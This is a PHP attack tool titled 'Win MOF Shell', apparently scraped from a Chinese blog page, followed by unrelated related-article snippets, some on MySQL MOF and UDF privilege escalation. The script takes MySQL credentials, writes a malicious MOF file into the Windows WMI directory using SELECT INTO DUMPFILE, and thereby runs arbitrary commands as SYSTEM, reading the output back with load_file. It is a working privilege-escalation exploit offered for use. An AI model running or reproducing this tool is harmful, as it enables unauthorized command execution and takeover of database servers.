<?php

$path="c:/caonimei.txt";

session_start();

if(!empty($_POST['submit'])){

setcookie("connect");

setcookie("connect[host]",$_POST['host']);

setcookie("connect[user]",$_POST['user']);

setcookie("connect[pass]",$_POST['pass']);

setcookie("connect[dbname]",$_POST['dbname']);

echo "<script>location.href='?action=connect'</script>";

}

if(empty($_GET["action"])){

?>

<html>

<head><title>Win MOF Shell</title></head>

<body>

<form action="?action=connect" method="post">

Host:

<input type="text" name="host" value="192.168.200.144:3306"><br/>

User:

<input type="text" name="user" value="root"><br/>

Pass:

<input type="password" name="pass" value="toor"><br/>

DB:

<input type="text" name="dbname" value="mysql"><br/>

<input type="submit" name="submit" value="Submit"><br/>

</form>

</body>

</html>

<?php

exit;

}

if ($_GET[action]=='connect')

{

$conn=mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["user"],$_COOKIE["connect"]["pass"])  or die('<pre>'.mysql_error().'</pre>');

echo "<form action='' method='post'>";

echo "Cmd:";

echo "<input type='text' name='cmd' value='$strCmd'?>";

echo "<br>";

echo "<br>";

echo "<input type='submit' value='Exploit'>";

echo "</form>";

echo "<form action='' method='post'>";

echo "<input type='hidden' name='flag' value='flag'>";

echo "<input type='submit'value=' Read  '>";

echo "</form>";

if (isset($_POST['cmd'])){

$strCmd=$_POST['cmd'];

$cmdshell='cmd /c '.$strCmd.'>'.$path;

$mofname="c:/windows/system32/wbem/mof/system.mof";

$payload = "#pragma namespace(\"\\\\\\\\\\\\\\\\.\\\\\\\\root\\\\\\\\subscription\")

instance of __EventFilter as \$EventFilter

{

  EventNamespace = \"Root\\\\\\\\Cimv2\";

  Name  = \"filtP2\";

  Query = \"Select * From __InstanceModificationEvent \"

      \"Where TargetInstance Isa \\\\\"Win32_LocalTime\\\\\" \"

      \"And TargetInstance.Second = 5\";

  QueryLanguage = \"WQL\";

};

instance of ActiveScriptEventConsumer as \$Consumer

{

  Name = \"consPCSV2\";

  ScriptingEngine = \"JScript\";

  ScriptText =

  \"var WSH = new ActiveXObject(\\\\\"WScript.Shell\\\\\")\\\\nWSH.run(\\\\\"$cmdshell\\\\\")\";

};

instance of __FilterToConsumerBinding

{

  Consumer = \$Consumer;

  Filter = \$EventFilter;

};";

mysql_select_db($_COOKIE["connect"]["dbname"],$conn);

$sql1="select '$payload' into dumpfile '$mofname';";

if(mysql_query($sql1))

  echo "<hr>Execute Successful!<br> Please click the read button to check the  result!!<br>If the result is not correct,try read again later<br><hr>"; else die(mysql_error());

mysql_close($conn);

}

if(isset($_POST['flag']))

{

  $conn=mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["user"],$_COOKIE["connect"]["pass"])  or die('<pre>'.mysql_error().'</pre>');

  $sql2="select load_file(\"".$path."\");";

  $result2=mysql_query($sql2);

  $num=mysql_num_rows($result2);

  while ($row = mysql_fetch_array($result2, MYSQL_NUM)) {

    echo "<hr/>";

    echo '<pre>'. $row[0].'</pre>';

  }

  mysql_close($conn);

}

}

?>

mof提权带回显带清楚命令版本.php的更多相关文章

  1. Mof提权科普

    今天再拿一个站的时候遇到了很多问题,拿站的过程就不说了,其中要用到mof提权,不管能不能提下,我进行一个mof提权的科普 这里我综合各类mof提权进行了 综合 首先说一下,无shell情况下的mysq ...

  2. MySQL-UDF和MOF提权

    MOF提权 MOF文件是mysql数据库的扩展文件(在c:/windows/system32/wbem/mof/nullevt.mof) 叫做”托管对象格式”,其作用是每隔五秒就会去监控进程创建和死亡 ...

  3. MySQL提权之mof提权

    mof提权原理 关于 mof 提权的原理其实很简单,就是利用了 c:/windows/system32/wbem/mof/ 目录下的 nullevt.mof 文件,每分钟都会在一个特定的时间去执行一次 ...

  4. [原创]MOF提权下载者代码

    0x001 网上的mof提权 调用的是js执行添加用户 而且有个缺陷 还不能一步到位...目标3389也连不上...也不知道上面安装了什么软件...毛然添加用户也不好比如有个类似狗之类的拦截添加用户 ...

  5. mof提权原理及实现

    关于 mof 提权的原理其实很简单,就是利用了c:/windows/system32/wbem/mof/目录下的 nullevt.mof 文件,每分钟都会在一个特定的时间去执行一次的特性,来写入我们的 ...

  6. mof提权原理及其过程

    mof提权的原理: mof是windows系统的一个文件(在c:/windows/system32/wbem/mof/nullevt.mof)叫做"托管对象格式"其作用是每隔五秒就 ...

  7. mysql之mof提权详解

    原理解读: Windows 管理规范 (WMI) 提供了以下三种方法编译到 WMI 存储库的托管对象格式 (MOF) 文件: 方法 1: 运行 MOF 文件指定为命令行参数将 Mofcomp.exe  ...

  8. Linux下提权常用小命令

    有些新手朋友在拿到一个webshell后如果看到服务器是Linux或Unix操作系统的就直接放弃提权,认为Linux或Unix下的提权很难,不是大家能做的,其实Linux下的提权并没有很多人想象的那么 ...

  9. Linux:常用命令讲解(系统、防火墙、提权与文件传输)

    一.系统用户操作指令 一般在 Linux 系统中有多个账号,但一般不推荐使用 root 账号,因为 root 账号的权限太大,如果账号泄露会有安全隐患: 一般配置软件时也不要在 root 账号下进行: ...

随机推荐

  1. Android app主线程UI更新间歇性崩溃的问题

    对App进行开发测试时,偶尔出现app崩溃的问题.日志如下: 10-25 18:44:52.935 15290-15290/com.zzq.cnblogs E/AndroidRuntime﹕ FATA ...

  2. 利用 Chromium Embedded Framework (CEF) 定制提取 Flash 视频的浏览器

    功能介绍: 利用 CEF 分析网页源码, 提取 flash 视频的代码. 提取的视频代码 LoadString 和 JS 两种方式重新插入到浏览器. (CEF_3.2171.1979_win32 - ...

  3. block引发的陷阱

    block在项目的开发中使用时非常频繁的,苹果官方也极力推荐使用block.其实,究其本质,block就是指向结构体的指针(可利用运行时机制查看底层生成的c代码).然而在使用block时会存在很多陷阱 ...

  4. Light OJ 1253 Misere Nim (尼姆博弈(2))

    LightOJ1253 :Misere Nim 时间限制:1000MS    内存限制:32768KByte   64位IO格式:%lld & %llu 描述 Alice and Bob ar ...

  5. 在竞赛ACM Java处理输入输出

    一.Java之ACM注意点 1. 类名称必须采用public class Main方式命名 2. 在有些OJ系统上,即便是输出的末尾多了一个“ ”,程序可能会输出错误,所以在我看来好多OJ系统做的是非 ...

  6. .NET的堆和栈01,基本概念、值类型内存分配

    当我们对.NET Framework的一些基本面了解之后,实际上,还是很有必要了解一些更底层的知识.比如.NET Framework是如何进行内存管理的,是如何垃圾回收的......这样,我们才能写出 ...

  7. platform_device与platform_driver

    转自:http://blog.csdn.net/zhandoushi1982/article/details/5130207 做Linux方面也有三个多月了,对代码中的有些结构一直不是很明白,比如pl ...

  8. Entity Framework 使用

    1.EF中Include方法的使用使用Include方法,告诉EF连接查询哪个外键属性,生成Inner join连接 //必须引用using System.Data.Entity;才能用Include ...

  9. poj 2019 二维rmq *

    题目大意:给出一个N*N矩形,每个格子上有一个价值.询问一个b*b的矩形在左上角的位置(x,y),(x+b-1,y+b-1)这一部分的最大值-最小值是多少. 模板题 #include <stdi ...

  10. C++的那些事:函数全解析

    一.函数的结构 函数在C++中可能出现在三种地方,一是函数的定义,它包括了如上图的结构:二是函数的声明,它与函数的定义相比,没有了函数体部分:三则是函数的调用.当然,不同的函数定义可以还会稍有不同,比 ...